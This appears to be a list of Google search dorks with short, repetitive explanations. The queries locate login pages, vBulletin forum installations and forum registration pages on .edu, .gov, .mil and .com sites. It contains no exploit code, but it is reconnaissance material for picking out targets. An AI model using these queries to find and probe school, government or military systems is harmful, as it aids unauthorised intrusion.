inurl:edu “login” – This Dork searches for websites on .edu domains that contain the words “login”. This Dork searches for school websites that contain student login information.
“powered by vbulletin” site:.edu – This Dork searches for websites on .edu domains that contain the words “powered by vbulletin”. This Dork searches for school websites that are running on the vbulletin forum software.
“powered by vbulletin” site:.gov – This Dork searches for websites on .gov domains that contain the words “powered by vbulletin”. This Dork searches for governmental websites that are running on the vbulletin forum software.
“powered by vbulletin” site:.mil – This Dork searches for websites on .mil domains that contain the words “powered by vbulletin”. This Dork searches for military websites that are running on the vbulletin forum software.
“powered by vbulletin” inurl:.edu – This Dork searches for websites on .edu domains that contain the words “powered by vbulletin”. This Dork searches for school websites that are running on the vbulletin forum software.
“powered by vbulletin” inurl:.mil – This Dork searches for websites on .mil domains that contain the words “powered by vbulletin”. This Dork searches for military websites that are running on the vbulletin forum software.
inurl:.com “powered by vbulletin” – This Dork searches for websites on .com domains that contain the words “powered by vbulletin”. This Dork searches for websites that are running on the vbulletin forum software.
inurl:.edu “register forum” – This Dork searches for websites on .edu domains that contain the words “register forum”. This Dork searches for school websites that allow you to register for a forum.
inurl:.gov “register forum” – This Dork searches for websites on .gov domains that contain the words “register forum”. This Dork searches for governmental websites that allow you to register for a forum.